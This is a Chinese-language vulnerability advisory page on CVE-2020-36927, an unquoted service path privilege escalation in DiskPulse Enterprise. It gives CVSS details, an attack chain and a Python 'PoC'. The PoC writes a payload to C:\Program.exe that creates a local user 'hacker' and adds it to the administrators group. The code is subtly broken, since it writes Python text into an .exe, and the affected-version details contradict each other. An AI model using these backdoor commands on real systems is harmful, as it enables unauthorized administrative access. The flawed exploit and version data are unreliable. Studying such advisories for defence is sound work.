IPBUF安全漏洞报告
English
CVE-2020-36927 CVSS 7.8 高危

CVE-2020-36927 DiskPulse Enterprise 未引用服务路径权限提升漏洞

披露日期: 2026-01-16
来源: [email protected]

漏洞信息

漏洞编号
CVE-2020-36927
漏洞类型
未引用服务路径漏洞
CVSS评分
7.8 高危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
DiskPulse Enterprise 13.6.14

相关标签

权限提升服务路径DiskPulseWindows

漏洞概述

CVE-2020-36927是DiskPulse Enterprise软件中的一个高危安全漏洞,CVSS评分为7.8。该漏洞源于Windows服务配置中的未引用服务路径问题,存在于DiskPulse Enterprise的bin目录中的diskpls.exe可执行文件中。攻击者可以通过利用未完全限定的服务路径,在服务启动时注入并执行恶意代码,从而实现本地权限提升。

技术细节

漏洞存在于服务可执行文件的路径处理机制中。DiskPulse Enterprise的diskpls.exe服务未使用引号包裹路径,允许攻击者通过创建同名恶意可执行文件来劫持服务执行流程。攻击者可在系统路径中植入恶意程序,利用Windows服务解析路径时的歧义性,在服务重启或系统启动时以提升的权限自动执行恶意代码。

攻击链分析

STEP 1
步骤1
识别DiskPulse Enterprise服务路径漏洞
STEP 2
步骤2
创建恶意可执行文件
STEP 3
步骤3
将恶意文件放置在服务路径中
STEP 4
步骤4
等待服务重启
STEP 5
步骤5
以SYSTEM权限执行恶意代码

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2020-36927 # Unquoted Service Path Privilege Escalation import os import sys def create_malicious_executable(): # 恶意可执行文件生成逻辑 malicious_code = ''' import os import sys def escalate_privileges(): # 权限提升逻辑 try: os.system('cmd /c net user hacker Password123! /add') os.system('cmd /c net localgroup administrators hacker /add') print('[+] Privilege escalation successful') except Exception as e: print(f'[-] Error: {e}') if __name__ == '__main__': escalate_privileges() ''' with open('C:\\Program.exe', 'w') as f: f.write(malicious_code) print('[+] Malicious executable created at C:\\Program.exe') if __name__ == '__main__': create_malicious_executable()

影响范围

DiskPulse Enterprise < 13.6.14

防御指南

临时缓解措施
立即升级DiskPulse Enterprise到最新版本,或临时禁用该服务以防止利用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表